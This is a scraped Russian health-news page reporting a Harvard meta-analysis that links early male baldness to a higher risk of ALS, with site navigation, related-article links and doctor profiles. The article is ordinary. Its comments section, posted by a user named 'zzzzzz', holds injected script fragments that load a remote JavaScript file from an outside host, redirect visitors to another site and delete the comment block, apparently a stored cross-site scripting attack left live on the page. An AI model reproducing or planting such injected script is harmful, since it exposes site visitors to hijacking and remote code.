Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Раннее облысение может ук...  >>  Раннее облысение может указывать на грядущий паралич
 
Обратная связь
 

Раннее облысение может указывать на грядущий паралич

Размер шрифта
06 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Лысина не портит мужчину? Возможно, так оно и есть, но американские ученые считают, что раннее выпадение волос может быть предвестником тяжелого неврологического заболевания.

Раннее облысение может указывать на грядущий паралич

Исследование проводилось в Гарвардском университете. Специалисты обнаружили, что рано лысеющие мужчины находятся в группе повышенного риска развития тяжелейшего заболевания нервной системы – бокового амиотрофического склероза (далее – БАК). Среди всех заболеваний двигательного нейрона БАК является самым распространенным. Болезнь проявляется восходящим параличом, атрофией и спазмом мышц, нарушениями глотания, дыхания и речи.

Известно, что в основе БАК лежат генетические нарушения, однако точная причина заболевания все еще неизвестна. Гарвардские ученые надеются, что их открытие приблизит обнаружение конкретного гена, с которым связано развитие этой страшной болезни.

 Ученые провели масштабный мета-анализ семи крупных исследований, в которых совокупности участвовало более 50 000 мужчин. Возраст испытуемых варьировал в диапазоне от 46 до 81 года. В 1992 году все они заполняли анкету, один из вопросов которой касался степени выпадения волос в возрасте 45 лет. В течение последующих 16 лет наблюдения обнаружилось, что у 42 мужчин развился БАК. Из них у 13 человек на момент начала исследования не было признаков облысения, у 18 отмечалось умеренное выпадение волос, а у 11 человек облысение было ярко выражено. Построив линейную математическую модель, авторы исследования пришли к выводу, что «у мужчин с ранней алопецией (то есть облысением – прим. Zdorovieinfo) повышен относительный риск БАК».

«Это не значит, что лысым мужчинам стоит волноваться», – рассказывает Элинор Фонделл, один из научных сотрудников Гарвардского университета. Она отмечает, что у некоторых больных с БАК не было абсолютно никаких признаков облысения, что указывает на сложность и неоднозначность этой взаимосвязи. И последняя, безусловно, нуждается в дальнейшем углубленном изучении.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Проблема облысения решена! Врачи заставляют лысые головы покрываться волосами!   Стволовые клетки сделают вашего мужа красавцем   Естественная красота и здоровье волос   У вас лысый муж? Он может умереть от инфаркта  
04 июня 2013У вас лысый муж? Он может умереть от инфаркта 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
40% лысеющих – женщины! Как не стать лысой
Как курение влияет на вашу кожу
Странности вашего тела

Тесты

1
Как устроены волосы человека?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.